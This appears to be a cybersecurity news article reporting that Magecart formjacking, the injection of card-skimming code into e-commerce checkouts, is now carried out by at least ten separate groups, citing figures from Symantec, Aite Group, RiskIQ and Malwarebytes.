Magecart can no longer be considered the work of a single cybercrime group, but rather, an e-commerce security threat category in its own right
When Magecart first appeared on the scene with the breach of payment websites belonging to household names including British Airways, Ticketmaster, Sotheby’s, Newegg, and Cathay Pacific, many believed it was the work of a single group with a predilection for credit card skimmers.
In a technique known as ‘formjacking’, Magecart attackers exploit vulnerabilities in websites using e-commerce backend systems including Magento to inject checkouts with malicious code that skims and steals payment card data.
This information is then whisked away to a command and control (C2) server, where it may be moved on and sold in underground markets or used to conduct fraudulent transactions online.
Symantec says that more than 4,800 websites are compromised through formjacking every month. One-third of all detections occur during the holiday shopping season.
With high-profile enterprise companies becoming lucrative sources for stolen data, cybercriminals want to cash in – and the Magecart technique is proving popular.
According to a new report released today (August 28) by Aite Group and Arxan, Magecart should now be considered an umbrella term, under which many different groups are operating.
RiskIQ and Flashpoint said in November that at least seven groups were in operation, which later rose to nine. It is now believed that at least 10 Magecart entities are involved in financial data theft.
“Magecart has gone from relative obscurity to dominating national headlines and ascending to the top of the e-commerce industry’s most-wanted list,” Aite says.
“While it originated back in 2015 as the name of a group installing skimmers on e-commerce sites, it’s now being used for anonymity by multiple groups that use the same tactics but different techniques.”
YOU MAY ALSO LIKE GandCrab closure will lead to ‘power vacuum’ in ransomware market
Infected servers were sending skimmed card details to cyberattacks and, in some cases, more than one group had managed to compromise the same website.
The increase in formjacking has resulted in some Magecart groups evolving their tactics beyond basic, vulnerability-based infection.
Magecart credit card skimmers have also recently been found in Amazon S3 buckets leading to the compromise of thousands of websites through so-called ‘spray and pray’ tactics, and in a recent case documented by Malwarebytes, the Poker Tracker software suite's website was running a vulnerable, outdated version of Drupal targeted by Magecart.
This may indicate that attackers using the Magecart technique are expanding beyond Magento to include other e-commerce systems.
Speaking to The Daily Swig, Jérôme Segura, director of threat intelligence at Malwarebytes, said that we should expect Magecart to encompass more techniques to both attack and avoid detection in the future.
“We should remember that web skimmers have existed for a long time and that the client-side artifacts we see these days could be replaced by server-side operations,” Segura says.